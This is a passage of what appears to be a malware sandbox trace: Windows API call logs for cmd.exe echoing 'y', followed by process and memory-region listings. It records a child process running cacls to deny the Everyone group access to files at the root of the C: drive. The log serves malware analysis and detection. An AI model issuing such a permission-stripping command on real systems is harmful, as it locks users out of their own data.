lpType=0x2deab4*=0x0, lpData=0x2deab8*=0x1, lpcbData=0x2deab0*=0x1000) returned 0x2 [0036.548] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2deab4, lpData=0x2deab8, lpcbData=0x2deab0*=0x1000 | out: lpType=0x2deab4*=0x4, lpData=0x2deab8*=0x0, lpcbData=0x2deab0*=0x4) returned 0x0 [0036.548] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2deab4, lpData=0x2deab8, lpcbData=0x2deab0*=0x1000 | out: lpType=0x2deab4*=0x4, lpData=0x2deab8*=0x40, lpcbData=0x2deab0*=0x4) returned 0x0 [0036.548] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2deab4, lpData=0x2deab8, lpcbData=0x2deab0*=0x1000 | out: lpType=0x2deab4*=0x4, lpData=0x2deab8*=0x40, lpcbData=0x2deab0*=0x4) returned 0x0 [0036.548] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2deab4, lpData=0x2deab8, lpcbData=0x2deab0*=0x1000 | out: lpType=0x2deab4*=0x0, lpData=0x2deab8*=0x40, lpcbData=0x2deab0*=0x1000) returned 0x2 [0036.548] RegCloseKey (hKey=0x40) returned 0x0 [0036.548] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2deaac | out: phkResult=0x2deaac*=0x40) returned 0x0 [0036.548] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2deab4, lpData=0x2deab8, lpcbData=0x2deab0*=0x1000 | out: lpType=0x2deab4*=0x0, lpData=0x2deab8*=0x40, lpcbData=0x2deab0*=0x1000) returned 0x2 [0036.548] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2deab4, lpData=0x2deab8, lpcbData=0x2deab0*=0x1000 | out: lpType=0x2deab4*=0x4, lpData=0x2deab8*=0x1, lpcbData=0x2deab0*=0x4) returned 0x0 [0036.548] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2deab4, lpData=0x2deab8, lpcbData=0x2deab0*=0x1000 | out: lpType=0x2deab4*=0x0, lpData=0x2deab8*=0x1, lpcbData=0x2deab0*=0x1000) returned 0x2 [0036.548] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2deab4, lpData=0x2deab8, lpcbData=0x2deab0*=0x1000 | out: lpType=0x2deab4*=0x4, lpData=0x2deab8*=0x0, lpcbData=0x2deab0*=0x4) returned 0x0 [0036.548] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2deab4, lpData=0x2deab8, lpcbData=0x2deab0*=0x1000 | out: lpType=0x2deab4*=0x4, lpData=0x2deab8*=0x9, lpcbData=0x2deab0*=0x4) returned 0x0 [0036.548] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2deab4, lpData=0x2deab8, lpcbData=0x2deab0*=0x1000 | out: lpType=0x2deab4*=0x4, lpData=0x2deab8*=0x9, lpcbData=0x2deab0*=0x4) returned 0x0 [0036.548] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2deab4, lpData=0x2deab8, lpcbData=0x2deab0*=0x1000 | out: lpType=0x2deab4*=0x0, lpData=0x2deab8*=0x9, lpcbData=0x2deab0*=0x1000) returned 0x2 [0036.548] RegCloseKey (hKey=0x40) returned 0x0 [0036.548] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa5004f [0036.548] srand (_Seed=0x5aa5004f) [0036.548] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" [0036.548] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" [0036.548] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0036.548] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x434060, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0036.549] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.549] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.549] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0036.549] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.549] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0036.549] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0036.549] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0036.549] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0036.549] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0036.549] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0036.549] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0036.549] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0036.549] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0036.549] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2df88c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0036.549] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x2df88c, lpFilePart=0x2df888 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x2df888*="Desktop") returned 0x1c [0036.549] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0036.549] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2df608 | out: lpFindFileData=0x2df608) returned 0x434270 [0036.549] FindClose (in: hFindFile=0x434270 | out: hFindFile=0x434270) returned 1 [0036.549] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x2df608 | out: lpFindFileData=0x2df608) returned 0x434270 [0036.549] FindClose (in: hFindFile=0x434270 | out: hFindFile=0x434270) returned 1 [0036.549] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0036.549] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x2df608 | out: lpFindFileData=0x2df608) returned 0x434270 [0036.549] FindClose (in: hFindFile=0x434270 | out: hFindFile=0x434270) returned 1 [0036.550] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0036.550] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0036.550] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0036.550] GetEnvironmentStringsW () returned 0x4360b0* [0036.550] FreeEnvironmentStringsA (penv="=") returned 1 [0036.550] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0036.550] GetConsoleOutputCP () returned 0x1b5 [0036.550] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.550] GetUserDefaultLCID () returned 0x409 [0036.551] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0036.551] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2df9b8, cchData=128 | out: lpLCData="0") returned 2 [0036.551] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2df9b8, cchData=128 | out: lpLCData="0") returned 2 [0036.551] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2df9b8, cchData=128 | out: lpLCData="1") returned 2 [0036.551] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0036.551] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0036.551] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0036.551] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0036.551] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0036.551] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0036.551] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0036.551] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0036.551] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0036.551] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0036.551] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0036.552] GetConsoleTitleW (in: lpConsoleTitle=0x434d78, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.552] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0036.552] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0036.552] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0036.552] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0036.553] _wcsicmp (_String1="echo", _String2=")") returned 60 [0036.553] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0036.553] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0036.553] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0036.553] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0036.553] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0036.553] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0036.553] GetConsoleTitleW (in: lpConsoleTitle=0x2df6a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.554] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0036.554] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0036.554] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0036.554] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0036.554] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0036.554] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0036.554] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0036.554] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0036.554] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0036.554] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0036.554] _vsnwprintf (in: _Buffer=0x12c8840, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x2df664 | out: _Buffer="y\r\n") returned 3 [0036.554] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.554] GetFileType (hFile=0x28) returned 0x3 [0036.554] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.554] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="y\r\n", cchWideChar=-1, lpMultiByteStr=0x12b6840, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\r\n", lpUsedDefaultChar=0x0) returned 4 [0036.555] WriteFile (in: hFile=0x28, lpBuffer=0x12b6840*, nNumberOfBytesToWrite=0x3, lpNumberOfBytesWritten=0x2df654, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesWritten=0x2df654*=0x3, lpOverlapped=0x0) returned 1 [0036.555] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.555] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 0 [0036.555] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.555] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0036.555] _get_osfhandle (_FileHandle=0) returned 0x24 [0036.555] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0036.555] SetConsoleInputExeNameW () returned 0x1 [0036.555] GetConsoleOutputCP () returned 0x1b5 [0036.555] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.555] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.555] exit (_Code=0) Process: id = "25" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0xf673000" os_pid = "0x8d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "cacls \"C:\\*.*\" /e /d everyone" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 998 start_va = 0x220000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 999 start_va = 0x240000 end_va = 0x241fff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1000 start_va = 0x250000 end_va = 0x25efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1001 start_va = 0x260000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1002 start_va = 0x2a0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1003 start_va = 0x2e0000 end_va = 0x2e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 1004 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1005 start_va = 0x300000 end_va = 0x301fff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1006 start_va = 0xb30000 end_va = 0xb39fff entry_point = 0xb30000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 1007 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1008 start_va = 0x7f7a0000 end_va = 0x7f7c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f7a0000" filename = "" Region: id = 1009 start_va = 0x7f7c8000 end_va = 0x7f7c8fff entry_point = 0x0 region_type = private name = "private_0x000000007f7c8000" filename = "" Region: id = 1010 start_va = 0x7f7cc000 end_va = 0x7f7cefff entry_point = 0x0 region_type = private name = "private_0x000000007f7cc000" filename = "" Region: id = 1011 start_va = 0x7f7cf000 end_va = 0x7f7cffff entry_point = 0x0 region_type = private name = "private_0x000000007f7cf000" filename = "" Region: id = 1012 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1013 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1014 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1015 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 1029 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1030 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1031 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1032 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1033 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 1034 start_va = 0x230000 end_va = 0x233fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 1035 start_va = 0x240000 end_va = 0x243fff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1036 start_va = 0x320000 end_va = 0x322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 1037 start_va = 0x330000 end_va = 0x330fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1038 start_va = 0x340000 end_va = 0x341fff entry_point = 0x340000 region_type = mapped_file name = "cacls.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cacls.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cacls.exe.mui") Region: id = 1039 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1040 start_va = 0x460000 end_va = 0x4ddfff entry_point = 0x460000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1041 start_va = 0x520000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 1042 start_va = 0x530000 end_va = 0x804fff entry_point = 0x530000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1043 start_va = 0x747f0000 end_va = 0x74814fff entry_point = 0x747f0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1044 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1045 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1046 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1047 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1048 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1049 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1050 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1051 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1052 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1053 start_va = 0x7f6a0000 end_va = 0x7f79ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6a0000" filename = "" Thread: id = 27 os_tid = 0x820 Process: id = "26" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x13501000" os_pid = "0xb40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1054 start_va = 0x7d0000 end_va = 0x7effff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 1055 start_va = 0x7f0000 end_va = 0x7f1fff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 1056 start_va = 0x800000 end_va = 0x80efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 1057 start_va = 0x810000 end_va = 0x84ffff entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 1058 start_va = 0x850000 end_va = 0x94ffff entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 1059 start_va = 0x950000 end_va = 0x953fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000950000" filename = "" Region: id = 1060 start_va = 0x960000 end_va = 0x960fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 1061 start_va = 0x970000 end_va = 0x971fff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 1062 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1063 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1064 start_va = 0x7f450000 end_va = 0x7f472fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f450000" filename = "" Region: id = 1065 start_va = 0x7f476000 end_va = 0x7f476fff entry_point = 0x0 region_type = private name = "private_0x000000007f476000" filename = "" Region: id = 1066 start_va = 0x7f47a000 end_va = 0x7f47cfff entry_point = 0x0 region_type = private name = "private_0x000000007f47a000" filename = "" Region: id = 1067 start_va = 0x7f47d000 end_va = 0x7f47dfff entry_point = 0x0 region_type = private name = "private_0x000000007f47d000" filename = "" Region: id = 1068 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1069 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1070 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1071 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 1090 start_va = 0xa80000 end_va = 0xa8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 1091 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1092 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1093 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1094 start_va = 0x7d0000 end_va = 0x7dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 1095 start_va = 0x7e0000 end_va = 0x7effff entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 1096 start_va = 0x980000 end_va = 0x9fdfff entry_point = 0x980000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1097 start_va = 0xb90000 end_va = 0xc8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 1098 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1099 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1100 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1101 start_va = 0x7f350000 end_va = 0x7f44ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f350000" filename = "" Region: id = 1102 start_va = 0x7f0000 end_va = 0x7f3fff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Thread: id = 28 os_tid = 0xbe8 [0036.632] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0036.632] 